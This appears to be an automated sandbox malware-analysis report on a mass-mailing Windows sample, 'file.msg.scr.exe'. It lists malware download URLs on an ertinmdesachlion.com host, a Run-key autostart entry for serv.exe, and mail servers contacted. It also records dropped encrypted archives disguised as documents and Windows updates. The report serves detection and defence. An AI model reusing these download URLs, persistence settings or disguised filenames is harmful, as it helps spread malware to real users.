                                  http://www4.ertinmdesachlion.com/chr/tdg/lt.exeaserv.exe, 00000005.00000002.631240133.00000000006BE000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www4.ertinmdesachlionYserv.exe, 00000005.00000002.631240133.00000000006BE000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www4.ertinmdesachlion.com/chr/tdg/lt.exe=serv.exe, 00000002.00000002.614445263.0000000000636000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www6.ertinmdesachlion.com/rserv.exe, 00000005.00000002.631240133.00000000006D9000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www4.ertinmdesachlion.com/chr/tdg/lt.exeserv.exe, 00000005.00000002.631240133.00000000006BE000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs
                                  IPDomainCountryFlagASNASN NameMalicious
                                  104.47.18.161
                                  hotmail-com.olc.protection.outlook.comUnited States
                                  8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                  142.250.150.26
                                  alt2.gmail-smtp-in.l.google.comUnited States
                                  15169GOOGLEUSfalse
                                  67.195.204.79
                                  mta7.am0.yahoodns.netUnited States
                                  26101YAHOO-3USfalse
                                  142.250.27.26
                                  gmail-smtp-in.l.google.comUnited States
                                  15169GOOGLEUSfalse
                                  67.195.204.74
                                  unknownUnited States
                                  26101YAHOO-3USfalse
                                  Joe Sandbox Version:37.1.0 Beryl
                                  Analysis ID:877404
                                  Start date and time:2023-05-29 12:07:32 +02:00
                                  Joe Sandbox Product:CloudBasic
                                  Overall analysis duration:0h 11m 22s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                  Number of analysed new started processes analysed:14
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:1
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • HDC enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample file name:file.msg.scr.exe
                                  Detection:MAL
                                  Classification:mal100.evad.winEXE@10/20@40/5
                                  EGA Information:
                                  • Successful, ratio: 100%
                                  HDC Information:
                                  • Successful, ratio: 50.3% (good quality ratio 49.5%)
                                  • Quality average: 80.9%
                                  • Quality standard deviation: 25.4%
                                  HCA Information:
                                  • Successful, ratio: 98%
                                  • Number of executed functions: 95
                                  • Number of non-executed functions: 110
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe
                                  • Exclude process from analysis (whitelisted): audiodg.exe, WerFault.exe, svchost.exe
                                  • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                  • Report size getting too big, too many NtEnumerateKey calls found.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  TimeTypeDescription
                                  12:08:47AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run serv C:\Windows\serv.exe s
                                  12:08:56API Interceptor12x Sleep call for process: serv.exe modified
                                  12:09:00API Interceptor657x Sleep call for process: explorer.exe modified
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  104.47.18.161Update-KB78-x86.exeGet hashmaliciousUnknownBrowse
                                    Update-KB2984-x86.exeGet hashmaliciousUnknownBrowse
                                      64434c8c20fe4b64041795ac2a1472662fa5d33fa0cbb.exeGet hashmaliciousRaccoon RedLine SmokeLoader Tofsee Vidar XmrigBrowse
                                        readme.txt.exeGet hashmaliciousUnknownBrowse
                                          R3459nT1Oj.exeGet hashmaliciousRaccoon RedLine SmokeLoader Tofsee Vidar XmrigBrowse
                                            Xz2kK8et6i.exeGet hashmaliciousTofsee XmrigBrowse
                                              SecuriteInfo.com.Trojan.DownLoader41.25700.7371.exeGet hashmaliciousTofsee XmrigBrowse
                                                JgC7A84YOU.exeGet hashmaliciousTofsee XmrigBrowse
                                                  d5lcwbdDfu.exeGet hashmaliciousTofsee XmrigBrowse
                                                    asgRF2AfuM.exeGet hashmaliciousTofsee XmrigBrowse
                                                      XK7H3egMcR.exeGet hashmaliciousTofsee XmrigBrowse
                                                        ivMI3veipP.exeGet hashmaliciousUnknownBrowse
                                                          file.msg.exeGet hashmaliciousUnknownBrowse
                                                            Update-KB1484-x86.exeGet hashmaliciousUnknownBrowse
                                                              sKu7FoPlk3.exeGet hashmaliciousUnknownBrowse
                                                                CJdYRiB9uJ.exeGet hashmaliciousUnknownBrowse
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  mta6.am0.yahoodns.netfile.exeGet hashmaliciousTofseeBrowse
                                                                  • 67.195.228.94
                                                                  .exeGet hashmaliciousUnknownBrowse
                                                                  • 98.136.96.91
                                                                  file.exeGet hashmaliciousTofseeBrowse
                                                                  • 98.136.96.76
                                                                  file.log.exeGet hashmaliciousUnknownBrowse
                                                                  • 67.195.228.94
                                                                  data.log.exeGet hashmaliciousUnknownBrowse
                                                                  • 67.195.228.109
                                                                  message.elm.exeGet hashmaliciousUnknownBrowse
                                                                  • 67.195.204.79
                                                                  message.txt.exeGet hashmaliciousUnknownBrowse
                                                                  • 98.136.96.77
                                                                  test.dat.exeGet hashmaliciousUnknownBrowse
                                                                  • 98.136.96.77
                                                                  Update-KB7390-x86.exeGet hashmaliciousUnknownBrowse
                                                                  • 67.195.228.110
                                                                  Update-KB6734-x86.exeGet hashmaliciousUnknownBrowse
                                                                  • 67.195.228.111
                                                                  Update-KB5058-x86.exeGet hashmaliciousUnknownBrowse
                                                                  • 98.136.96.77
                                                                  Update-KB78-x86.exeGet hashmaliciousUnknownBrowse
                                                                  • 98.136.96.77
                                                                  file.txt.exeGet hashmaliciousUnknownBrowse
                                                                  • 67.195.204.72
                                                                  Update-KB250-x86.exeGet hashmaliciousUnknownBrowse
                                                                  • 98.136.96.74
                                                                  Update-KB2984-x86.exeGet hashmaliciousUnknownBrowse
                                                                  • 67.195.204.79
                                                                  doc.msg.exeGet hashmaliciousUnknownBrowse
                                                                  • 67.195.228.94
                                                                  3hTS09wZ7G.exeGet hashmaliciousRaccoon RedLine SmokeLoader TofseeBrowse
                                                                  • 67.195.228.110
                                                                  DUpgpAnHkq.exeGet hashmaliciousRaccoon RedLine SmokeLoader TofseeBrowse
                                                                  • 67.195.204.73
                                                                  38fd2cb3083f33b50606b7821453769103bde24335734.exeGet hashmaliciousRaccoon RedLine SmokeLoader Tofsee XmrigBrowse
                                                                  • 67.195.228.94
                                                                  bk0Yz4tRBL.exeGet hashmaliciousRaccoon RedLine SmokeLoader Tofsee XmrigBrowse
                                                                  • 98.136.96.74
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  MICROSOFT-CORP-MSN-AS-BLOCKUShttps://docsend.com/view/knqpqvi6upg3etc3Get hashmaliciousHTMLPhisherBrowse
                                                                  • 13.107.213.45
                                                                  ATT00001.htmGet hashmaliciousHTMLPhisherBrowse
                                                                  • 40.126.31.69
                                                                  EjCbuQy79c.elfGet hashmaliciousUnknownBrowse
                                                                  • 70.37.80.66
                                                                  pu3jOk0Q9u.elfGet hashmaliciousMiraiBrowse
                                                                  • 13.85.27.140
                                                                  ztXcSRBenJ.elfGet hashmaliciousMirai, MoobotBrowse
                                                                  • 20.47.11.53
                                                                  2GEYpUwMpu.elfGet hashmaliciousMirai, MoobotBrowse
                                                                  • 52.247.37.67
                                                                  zUef8vCfWo.elfGet hashmaliciousMirai, MoobotBrowse
                                                                  • 157.56.241.242
                                                                  https://docs.punksecurity.io/Get hashmaliciousUnknownBrowse
                                                                  • 13.107.237.60
                                                                  9CgZODkY31.elfGet hashmaliciousMirai, MoobotBrowse
                                                                  • 158.158.111.129
                                                                  https://campusprconsulting.com/email/verification/sf_rand_string_lowercase6/Y2Fyb2xhbm4uY29sZW1hbkBjbWRncm91cC5jb20=Get hashmaliciousHTMLPhisherBrowse
                                                                  • 13.107.237.60
                                                                  8iEESoleF3.elfGet hashmaliciousMirai, MoobotBrowse
                                                                  • 52.254.246.150
                                                                  2qeSzBWdLd.elfGet hashmaliciousMirai, MoobotBrowse
                                                                  • 52.182.198.30
                                                                  file.exeGet hashmaliciousTofseeBrowse
                                                                  • 40.93.207.1
                                                                  k0C5SQKnGY.elfGet hashmaliciousMirai, MoobotBrowse
                                                                  • 13.96.20.249
                                                                  https://f2-elettronico.de/NL/intesa/intesaGet hashmaliciousUnknownBrowse
                                                                  • 13.107.237.60
                                                                  yR28mIJkTh.elfGet hashmaliciousMirai, MoobotBrowse
                                                                  • 13.100.15.152
                                                                  ImLGHvoNJt.elfGet hashmaliciousMirai, MoobotBrowse
                                                                  • 20.230.213.91
                                                                  ts4ow0Q1ph.elfGet hashmaliciousMirai, MoobotBrowse
                                                                  • 40.113.32.148
                                                                  0v9Qo9on5n.elfGet hashmaliciousMiraiBrowse
                                                                  • 52.121.72.156
                                                                  rZ77B7c0R4.elfGet hashmaliciousMiraiBrowse
                                                                  • 52.122.36.5
                                                                  No context
                                                                  No context
                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                  File Type:Mini DuMP crash report, 14 streams, Mon May 29 10:08:59 2023, 0x1205a4 type
                                                                  Category:dropped
                                                                  Size (bytes):141644
                                                                  Entropy (8bit):1.9457814315262165
                                                                  Encrypted:false
                                                                  SSDEEP:384:bKr9RMa6C1zmmI00Gl7G2NwSpYOvFWx+KA9gXzukEG58sTZFkC:bq6C1zmjOI2jNnzYEG58UQC
                                                                  MD5:8D4F1D767429957FC73BA90097181CE1
                                                                  SHA1:A2DA38628B970DCEB6F36051453BB54723C6065E
                                                                  SHA-256:965ED945CB3453F87CC5BCEAD91877910E45B0291653E4521F94E559FB0625B6
                                                                  SHA-512:D53FD13A9D9B7DDB341BF0CC540B95179CD64B5795399ED85A74CF40CC6B98C01092F30996D35D24CF92379DC8943A07688606E11A277DA165064556EAB3B867
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:MDMP....... ........ytd.........................................W..........T.......8...........T...........P8...........................!...................................................................U...........B......."......GenuineIntelW...........T.......t....ytd.............................0..2...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):6258
                                                                  Entropy (8bit):3.7167755787887926
                                                                  Encrypted:false
                                                                  SSDEEP:192:Rrl7r3GLNiek6E8YgIStwI+pDZ89bawsfw+m:RrlsNiV6E8YgISNaDfQ
                                                                  MD5:E54ECD38EFC0DA31845DC748690C64D2
                                                                  SHA1:E60450FE873CD3A20E0333E3592A5783F5C97E44
                                                                  SHA-256:048DE83F1AC551059FAE2218C3BA9AC622B40EE8C97A9FAC746967ADDB30C1B6
                                                                  SHA-512:9FB781AF6CCCAE0E29342D75CF1683EAEB80855CD3338787E3B5D2CDB484CBFA841C52174C90BA0A758D4F2107DFDFA42E7D45120C648D7B7EF115CCF84A548B
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.2.8.<./.P.i.d.>.......
                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                  File Type:Mini DuMP crash report, 15 streams, Mon May 29 10:09:00 2023, 0x1205a4 type
                                                                  Category:dropped
                                                                  Size (bytes):326836
                                                                  Entropy (8bit):1.5174235239024396
                                                                  Encrypted:false
                                                                  SSDEEP:768:FrwUIQvB6BDpeAsX3tl/EAPZSf5YpHP4u7dlukj:zImIBD7sXr/EAcfepv4uDtj
                                                                  MD5:66F5EC7AF7AB83225F1FE41DDC72EC32
                                                                  SHA1:6337BF2D63D3F3002E178E91DF309F936D5DE06B
                                                                  SHA-256:6FECE78AF9792211FB04B9403BB1A3DCD2D68A62D30AE467B1349A99084B82DB
                                                                  SHA-512:F161BE210EA21FCD4759FCF59A7214DAEE3D6D58F2FD06189A03E2A3C36EAEC7D60780BAEAB49E3A4325F5BCD2D29DF0D2BE57AFE97FD5013B95F0B0F7935F14
                                                                  Malicious:false
                                                                  Preview:MDMP....... ........ytd....................................................P>..........`.......8...........T............=...............!...........#...................................................................U...........B......4$......GenuineIntelW...........T............ytd.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):8372
                                                                  Entropy (8bit):3.6949145472657356
                                                                  Encrypted:false
                                                                  SSDEEP:192:Rrl7r3GLNiCB6Gg6Y+26ccgmf+5ASlO+pDB89bvJsfVsFm:RrlsNi06Gg6Yn6ccgmf+6SmvifVj
                                                                  MD5:5E2E31121CB671D58B7E8B0D10B028CE
                                                                  SHA1:9BB3F10E89943CF30D942F2E4164380711B01BEB
                                                                  SHA-256:2BCC303EB7F28ACDDB7634B41753FD25994B4C8C2DEF12A5B735016644E3A89A
                                                                  SHA-512:0FA94886D71B216525D62E198799B5A58B8E8A638ACB67F3BE47028BB42310F810EC1A4F2239DFCFCDDF2A7F285DF9BB01B6D5362A6793D9FC1FA6EAC9A9EFEB
                                                                  Malicious:false
                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.7.4.8.<./.P.i.d.>.......
                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                  File Type:Mini DuMP crash report, 14 streams, Mon May 29 10:09:09 2023, 0x1205a4 type
                                                                  Category:dropped
                                                                  Size (bytes):129382
                                                                  Entropy (8bit):1.8442376646649499
                                                                  Encrypted:false
                                                                  SSDEEP:384:ClCJzSV8WRkzwPsawwF4qYjq+JZNvI/U3i/iYoml:aChWRkzys5J9lZN5eDl
                                                                  MD5:7ED40E1C406653AD1606CF7575D863F8
                                                                  SHA1:C7B1E0F197E6C8AF9B8B6EB6CD728C6E0CBA3743
                                                                  SHA-256:EBCC9AC4238E25FD43C98D85F2708375BF1B726219ADC1F13134F36977B15FC3
                                                                  SHA-512:2E46CC64964164690392890FED455AFAFD4564B65BEA2D1C935BA0D77608666ECF27C557A907B2E03FF535AA0464831C68588BBC4AC895E84F9F5C5882B1BB01
                                                                  Malicious:false
                                                                  Preview:MDMP....... ........ytd.........................................V..........T.......8...........T............5..............(............!...................................................................U...........B.......!......GenuineIntelW...........T............ytd............................. ..2...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):8278
                                                                  Entropy (8bit):3.6938876891401122
                                                                  Encrypted:false
                                                                  SSDEEP:192:Rrl7r3GLNiWB6IS6YeZSUjgmfgISAB3Dh+pDw89bevO3sf5Hqm:RrlsNio6X6YQSUjgmfgISqMe1fV
                                                                  MD5:067E371E1835B896EE1C3315A06A3772
                                                                  SHA1:C9AC7165DB1F7B88E11228D90BE96FF0074DB139
                                                                  SHA-256:52B58007F989C9B94541C77B48FAEE9502074CCAA528219C3F786598864643F1
                                                                  SHA-512:0FD5D231720BA21EF24340A4C550663101BBA5D377020C29CB516CEF8E5B3E5557D9114FE636CB581C44AEFBA75434A2FA7B64A92D755B479812A63EBE84AA19
                                                                  Malicious:false
                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.7.9.6.<./.P.i.d.>.......
                                                                  Process:C:\Windows\serv.exe
                                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                  Category:dropped
                                                                  Size (bytes):276498
                                                                  Entropy (8bit):7.9975652725042785
                                                                  Encrypted:true
                                                                  SSDEEP:6144:GHBMAf/u4bsMrM85vTtcK79Ibuwf8twej93OIXumeBi:GHOQu4ntvT579Nwf8tLJ3OIX2Bi
                                                                  MD5:8C3F3B9C4DC0ACB40834A23BBEAA359D
                                                                  SHA1:E0499EEFDF5428AB47A9A644B6BCF4D5A7E762B6
                                                                  SHA-256:9FD510468E5382EE45DCA9E7A75B25BCC4A84FA3C832E236B71DDF62085053D5
                                                                  SHA-512:6B197BA92213AB55688BBF5D7B18CB011DA6E59A03418C5BFA477A7765F98EF3856C3A803CCD9EFBBB4074AE7693761783FE5C26FB30940AC7F52356805C2515
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  Preview:PK............4j...7..........docs.elm.pif..x...?............Y5...D..j.$D......I.@..*&......fs....j.Vk?..U....I..A..h...@@...Q...f.Mv..i...^.{.&...g...:s...7M.....<~\zv...}.-....&..7.v....&.Wv{y..p`.M}...K_|..w..;.q.....o....?.p....I..=..6>..CL>....ACK...?..P..A.5...>..|N.e.. "..W_..-..R$..Ke(..R..`.?....6..Fi..v.)....~..{.|O..).=..........S.{.|O..).=...O....Q......t.......Z...}....;mU.gU....T.5=aw`.........1>......?.c^..._...-..sp...c.\...N.(7..l+RL......_.....t..]..4{..?F.J.o.[..ZQ3..#F.6..hm..M.]....w....2..G...._y.....*O.*...(.[..ET{.w...8.....eux.E.6m.3I.sr..}S..e..f....1x..&M.....&......C0...M5...J........f...GJO.J.F......G..Z...t.....8.W.wp.3U<...h6i......Z...($..S.-........,..H..Dw.SkT........i0..@..*...X....`..X....L\.+..fc...m.......(.......$........(... g.Ak...g...+.R....4.0O|.b....I%m.q9.f9.r..|...7.gQaAr.....&..C..js.fmsB.w.6...h{F.......w..F../.g..Z.<o.J#./.z....|NK../..^....<.m.;0..D}..5<..R..g....6Bl...}......}....}3.
                                                                  Process:C:\Windows\serv.exe
                                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                  Category:dropped
                                                                  Size (bytes):276516
                                                                  Entropy (8bit):7.997566441979322
                                                                  Encrypted:true
                                                                  SSDEEP:6144:dHBMAf/u4bsMrM85vTtcK79Ibuwf8twej93OIXumeBt:dHOQu4ntvT579Nwf8tLJ3OIX2Bt
                                                                  MD5:0E49465623E5E4A2A26AD0FEC568E0A9
                                                                  SHA1:09C97E6B700CA11FFCD634C491D291E066714094
                                                                  SHA-256:BB9C12E885EA9A0ACA1A936D00DCD9872AF00071069318A443A5865C2F175E78
                                                                  SHA-512:E846871BF44DEE4142E3E1E4CA2A0CBAC694293C4FCFC7E7A83F391858DF1746AC203A3AF7EC79FCCF83C805C828A7DF21B2593C41A5549A0CCA6558812DBA5F
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  Preview:PK............k..u.7..........Update-KB1015-x86.exe..x...?............Y5...D..j.$D......I.@..*&......fs....j.Vk?..U....I..A..h...@@...Q...f.Mv..i...^.{.&...g...:s...7M.....<~\zv...}.-....&..7.v....&.Wv{y..p`.M}...K_|..w..;.q.....o....?.p....I..=..6>..CL>....ACK...?..P..A.5...>..|N.e.. "..W_..-..R$..Ke(..R..`.?....6..Fi..v.)....~..{.|O..).=..........S.{.|O..).=...O....Q......t.......Z...}....;mU.gU....T.5=aw`.........1>......?.c^..._...-..sp...c.\...N.(7..l+RL......_.....t..]..4{..?F.J.o.[..ZQ3..#F.6..hm..M.]....w....2..G...._y.....*O.*...(.[..ET{.w...8.....eux.E.6m.3I.sr..}S..e..f....1x..&M.....&......C0...M5...J........f...GJO.J.F......G..Z...t.....8.W.wp.3U<...h6i......Z...($..S.-........,..H..Dw.SkT........i0..@..*...X....`..X....L\.+..fc...m.......(.......$........(... g.Ak...g...+.R....4.0O|.b....I%m.q9.f9.r..|...7.gQaAr.....&..C..js.fmsB.w.6...h{F.......w..F../.g..Z.<o.J#./.z....|NK../..^....<.m.;0..D}..5<..R..g....6Bl...}.....
                                                                  Process:C:\Windows\serv.exe
                                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                  Category:dropped
                                                                  Size (bytes):276498
                                                                  Entropy (8bit):7.997564568005335
                                                                  Encrypted:true
                                                                  SSDEEP:6144:9HBMAf/u4bsMrM85vTtcK79Ibuwf8twej93OIXumeBD:9HOQu4ntvT579Nwf8tLJ3OIX2BD
                                                                  MD5:532C7902F31D9896DF376634B616E627
                                                                  SHA1:8DE7CBEEFB0F8C9EA0A5ACFAE832ACBFCBBAE556
                                                                  SHA-256:0D0148245E80C77869B19A9F0F4E8960267D7FC0936EC1160B70C583126D2F08
                                                                  SHA-512:6AE828D74CA9995054497CA377D1724B57CB5CEF7EB6D8C764ECBAAAF69D1B9CED8E7E94CB0D725FC9E22C29F1305D76776F0660D17A2B82F80B65015CE457A1
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  Preview:PK............4j...7..........docs.txt.scr..x...?............Y5...D..j.$D......I.@..*&......fs....j.Vk?..U....I..A..h...@@...Q...f.Mv..i...^.{.&...g...:s...7M.....<~\zv...}.-....&..7.v....&.Wv{y..p`.M}...K_|..w..;.q.....o....?.p....I..=..6>..CL>....ACK...?..P..A.5...>..|N.e.. "..W_..-..R$..Ke(..R..`.?....6..Fi..v.)....~..{.|O..).=..........S.{.|O..).=...O....Q......t.......Z...}....;mU.gU....T.5=aw`.........1>......?.c^..._...-..sp...c.\...N.(7..l+RL......_.....t..]..4{..?F.J.o.[..ZQ3..#F.6..hm..M.]....w....2..G...._y.....*O.*...(.[..ET{.w...8.....eux.E.6m.3I.sr..}S..e..f....1x..&M.....&......C0...M5...J........f...GJO.J.F......G..Z...t.....8.W.wp.3U<...h6i......Z...($..S.-........,..H..Dw.SkT........i0..@..*...X....`..X....L\.+..fc...m.......(.......$........(... g.Ak...g...+.R....4.0O|.b....I%m.q9.f9.r..|...7.gQaAr.....&..C..js.fmsB.w.6...h{F.......w..F../.g..Z.<o.J#./.z....|NK../..^....<.m.;0..D}..5<..R..g....6Bl...}......}....}3.
                                                                  Process:C:\Windows\serv.exe
                                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                  Category:modified
                                                                  Size (bytes):276516
                                                                  Entropy (8bit):7.997566274861564
                                                                  Encrypted:true
                                                                  SSDEEP:6144:8HBMAf/u4bsMrM85vTtcK79Ibuwf8twej93OIXumeBe:8HOQu4ntvT579Nwf8tLJ3OIX2Be
                                                                  MD5:83D439D405946C51436F969E8FFB2240
                                                                  SHA1:02F6F05A69D25EBB9998969434719306727C3EE8
                                                                  SHA-256:6A34AEE57AE1A06A14D7D1E1D5659983A33CF859C80202CC31FAF24E38DF3ABB
                                                                  SHA-512:78CF1736188DCEC0211B285FBBD84FB619DC1CF043D5CAD151A629B6624EACBF3FB1E4C91D0871D5AFB167B4C7B11EBFC0AAB4D2F922F025ABC8FAEDB5950F1C
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
